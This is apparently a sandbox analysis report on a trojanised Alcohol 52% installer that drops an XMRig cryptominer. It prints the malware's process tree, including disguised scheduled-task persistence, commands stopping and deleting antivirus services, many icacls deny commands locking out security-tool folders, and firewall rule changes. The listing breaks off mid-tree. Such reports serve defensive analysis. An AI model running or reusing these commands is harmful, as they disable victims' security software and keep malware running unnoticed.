Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-06-2024 03:28

General

  • Target

    Alcohol_120_v2.0.3/Alcohol.52.Free.Edition.v2.0.3.6951.exe

  • Size

    871KB

  • MD5

    a801066da12e786c0277e70c191bc936

  • SHA1

    2920b27e50c079f99502d2f574655e20657bdebd

  • SHA256

    599297d2596c79c0f43b555a88a77f7f89943397298a60cf7fc991b6d0e696c3

  • SHA512

    31292e5ebebb03de4018b04a28324c65e36656472cdc98328ad4f77544a762f5f0c397b6f12c886272fc08f4d9fa7579560e0cf33f02e19af4fd7e7731d619d8

  • SSDEEP

    12288:GCdOy3vVrKxR5CXbNjAOxK/j2n+4YG/6c1mFFja3mXgcjfRlgsUBgasLvhpFQ:GCdxte/80jYLT3U1jfsWasDbFQ

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 1 IoCs
  • Blocks application from running via registry modification 13 IoCs

    Adds application to list of disallowed applications.

  • Drops file in Drivers directory 2 IoCs
  • Modifies Windows Firewall 2 TTPs 5 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 7 IoCs
  • Modifies file permissions 1 TTPs 56 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Modifies WinLogon 2 TTPs 6 IoCs
  • AutoIT Executable 5 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 21 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe
    "C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:208
    • C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin
      C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin -ptoptorrent
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2008
      • C:\ProgramData\Setup\update.exe
        "C:\ProgramData\Setup\update.exe"
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • Blocks application from running via registry modification
        • Drops file in Drivers directory
        • Checks computer location settings
        • Executes dropped EXE
        • Modifies WinLogon
        • Drops file in Program Files directory
        • NTFS ADS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1228
        • C:\ProgramData\Setup\taskhost.exe
          C:\ProgramData\Setup\taskhost.exe
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          PID:2184
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
            5⤵
            • Drops file in Drivers directory
            PID:2508
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
            5⤵
            • Creates scheduled task(s)
            PID:4332
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
            5⤵
            • Creates scheduled task(s)
            PID:2252
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
            5⤵
            • Creates scheduled task(s)
            PID:3200
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:4992
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:2012
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:4120
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:2688
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc start appidsvc
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3812
          • C:\Windows\SysWOW64\sc.exe
            sc start appidsvc
            5⤵
            • Launches sc.exe
            PID:4332
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc start appmgmt
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4304
          • C:\Windows\SysWOW64\sc.exe
            sc start appmgmt
            5⤵
            • Launches sc.exe
            PID:564
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1672
          • C:\Windows\SysWOW64\sc.exe
            sc config appidsvc start= auto
            5⤵
            • Launches sc.exe
            PID:4936
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2912
          • C:\Windows\SysWOW64\sc.exe
            sc config appmgmt start= auto
            5⤵
            • Launches sc.exe
            PID:4608
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete swprv
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4868
          • C:\Windows\SysWOW64\sc.exe
            sc delete swprv
            5⤵
            • Launches sc.exe
            PID:548
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop mbamservice
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1380
          • C:\Windows\SysWOW64\sc.exe
            sc stop mbamservice
            5⤵
            • Launches sc.exe
            PID:4852
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1248
          • C:\Windows\SysWOW64\sc.exe
            sc stop bytefenceservice
            5⤵
            • Launches sc.exe
            PID:1768
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
          4⤵
            PID:4996
            • C:\Windows\SysWOW64\sc.exe
              sc delete bytefenceservice
              5⤵
              • Launches sc.exe
              PID:1636
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c sc delete mbamservice
            4⤵
              PID:4860
              • C:\Windows\SysWOW64\sc.exe
                sc delete mbamservice
                5⤵
                • Launches sc.exe
                PID:416
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c sc delete crmsvc
              4⤵
                PID:3464
                • C:\Windows\SysWOW64\sc.exe
                  sc delete crmsvc
                  5⤵
                  • Launches sc.exe
                  PID:3996
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
                4⤵
                  PID:3852
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh advfirewall set allprofiles state on
                    5⤵
                    • Modifies Windows Firewall
                    PID:2252
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                  4⤵
                    PID:1916
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                      5⤵
                      • Modifies Windows Firewall
                      PID:3980
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                    4⤵
                      PID:1396
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                        5⤵
                        • Modifies Windows Firewall
                        PID:1376
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                      4⤵
                        PID:4120
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                          5⤵
                          • Modifies Windows Firewall
                          PID:1860
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                        4⤵
                          PID:3692
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                            5⤵
                            • Modifies Windows Firewall
                            PID:1224
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
                          4⤵
                            PID:3040
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
                              5⤵
                              • Modifies file permissions
                              PID:688
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                            4⤵
                              PID:4576
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                5⤵
                                • Modifies file permissions
                                PID:2568
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
                              4⤵
                                PID:5084
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
                                  5⤵
                                  • Modifies file permissions
                                  PID:2500
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                4⤵
                                  PID:3212
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                    5⤵
                                    • Modifies file permissions
                                    PID:1380
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
                                  4⤵
                                    PID:5012
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
                                      5⤵
                                      • Modifies file permissions
                                      PID:1416
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                    4⤵
                                      PID:2908
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                        5⤵
                                        • Modifies file permissions
                                        PID:1840
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
                                      4⤵
                                        PID:4864
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
                                          5⤵
                                          • Modifies file permissions
                                          PID:1720
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                        4⤵
                                          PID:4104
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                            5⤵
                                            • Modifies file permissions
                                            PID:3580
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
                                          4⤵
                                            PID:3444
                                            • C:\Windows\SysWOW64\icacls.exe
                                              icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
                                              5⤵
                                              • Modifies file permissions
                                              PID:4772
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                            4⤵
                                              PID:3992
                                              • C:\Windows\SysWOW64\icacls.exe
                                                icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                5⤵
                                                • Modifies file permissions
                                                PID:1896
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
                                              4⤵
                                                PID:3996
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
                                                  5⤵
                                                  • Modifies file permissions
                                                  PID:4060
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                4⤵
                                                  PID:1160
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                    5⤵
                                                    • Modifies file permissions
                                                    PID:1864
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
                                                  4⤵
                                                    PID:516
                                                    • C:\Windows\SysWOW64\icacls.exe
                                                      icacls c:\programdata\Malwarebytes /deny Admin:(F)
                                                      5⤵
                                                      • Modifies file permissions
                                                      PID:4976
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
                                                    4⤵
                                                      PID:956
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls c:\programdata\Malwarebytes /deny System:(F)
                                                        5⤵
                                                        • Modifies file permissions
                                                        PID:2180
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
                                                      4⤵
                                                        PID:4388
                                                        • C:\Windows\SysWOW64\icacls.exe
                                                          icacls C:\Programdata\MB3Install /deny Admin:(F)
                                                          5⤵
                                                          • Modifies file permissions
                                                          PID:3960
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
                                                        4⤵
                                                          PID:4608
                                                          • C:\Windows\SysWOW64\icacls.exe
                                                            icacls C:\Programdata\MB3Install /deny System:(F)
                                                            5⤵
                                                            • Modifies file permissions
                                                            PID:3040
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
                                                          4⤵
                                                            PID:232
                                                            • C:\Windows\SysWOW64\icacls.exe
                                                              icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
                                                              5⤵
                                                              • Modifies file permissions
                                                              PID:4444
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                            4⤵
                                                              PID:3036
                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                5⤵
                                                                • Modifies file permissions
                                                                PID:4800
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
                                                              4⤵
                                                                PID:3592
                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                  icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
                                                                  5⤵
                                                                  • Modifies file permissions
                                                                  PID:2340
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
                                                                4⤵
                                                                  PID:3784
                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                    icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
                                                                    5⤵
                                                                    • Modifies file permissions
                                                                    PID:4944
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
                                                                  4⤵
                                                                    PID:4868
                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                      icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
                                                                      5⤵
                                                                      • Modifies file permissions
                                                                      PID:1032
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                                    4⤵
                                                                      PID:1768
                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                        icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                                        5⤵
                                                                        • Modifies file permissions
                                                                        PID:4036
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
                                                                      4⤵
                                                                        PID:2952
                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                          icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
                                                                          5⤵
                                                                          • Modifies file permissions
                                                                          PID:416
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
                                                                        4⤵
                                                                          PID:2012
                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                            icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
                                                                            5⤵
                                                                            • Modifies file permissions
                                                                            PID:952
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
                                                                          4⤵
                                                                            PID:3444
                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                              icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                              5⤵
                                                                              • Modifies file permissions
                                                                              PID:216
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
                                                                            4⤵
                                                                              PID:836
                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
                                                                                5⤵
                                                                                • Modifies file permissions
                                                                                PID:5092
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
                                                                              4⤵
                                                                                PID:3628
                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                  icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
                                                                                  5⤵
                                                                                  • Modifies file permissions
                                                                                  PID:1992
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
                                                                                4⤵
                                                                                  PID:64
                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                    icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
                                                                                    5⤵
                                                                                    • Modifies file permissions
                                                                                    PID:4976
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
                                                                                  4⤵
                                                                                    PID:4124
                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                      icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                                      5⤵
                                                                                      • Modifies file permissions
                                                                                      PID:3952
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                    4⤵
                                                                                      PID:4576
                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                        icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                        5⤵
                                                                                        • Modifies file permissions
                                                                                        PID:1932
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                      4⤵
                                                                                        PID:564
                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                          icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                          5⤵
                                                                                          • Modifies file permissions
                                                                                          PID:2560
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                        4⤵
                                                                                          PID:4844
                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                            icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                            5⤵
                                                                                            • Modifies file permissions
                                                                                            PID:2340
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
                                                                                          4⤵
                                                                                            PID:2500
                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                              icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
                                                                                              5⤵
                                                                                              • Modifies file permissions
                                                                                              PID:3384
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
                                                                                            4⤵
                                                                                              PID:2472
                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                5⤵
                                                                                                • Modifies file permissions
                                                                                                PID:3212
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
                                                                                              4⤵
                                                                                                PID:3724
                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                  icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
                                                                                                  5⤵
                                                                                                  • Modifies file permissions
                                                                                                  PID:2644
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                4⤵
                                                                                                  PID:2956
                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                    icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                    5⤵
                                                                                                    • Modifies file permissions
                                                                                                    PID:3484
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                  4⤵
                                                                                                    PID:4864
                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                      icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                      5⤵
                                                                                                      • Modifies file permissions
                                                                                                      PID:1620
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
                                                                                                    4⤵
                                                                                                      PID:4888
                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
                                                                                                        5⤵
                                                                                                        • Modifies file permissions
                                                                                                        PID:1976
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                      4⤵
                                                                                                        PID:1300
                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                          icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                          5⤵
                                                                                                          • Modifies file permissions
                                                                                                          PID:1896
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                        4⤵
                                                                                                          PID:592
                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                            icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                            5⤵
                                                                                                            • Modifies file permissions
                                                                                                            PID:3444
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                          4⤵
                                                                                                            PID:224
                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                              icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                              5⤵
                                                                                                              • Modifies file permissions
                                                                                                              PID:2508
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                            4⤵
                                                                                                              PID:4992
                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                5⤵
                                                                                                                • Modifies file permissions
                                                                                                                PID:2412
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                              4⤵
                                                                                                                PID:2864
                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                  icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                  5⤵
                                                                                                                  • Modifies file permissions
                                                                                                                  PID:1172
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
                                                                                                                4⤵
                                                                                                                  PID:4000
                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                    icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
                                                                                                                    5⤵
                                                                                                                    • Modifies file permissions
                                                                                                                    PID:4064
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
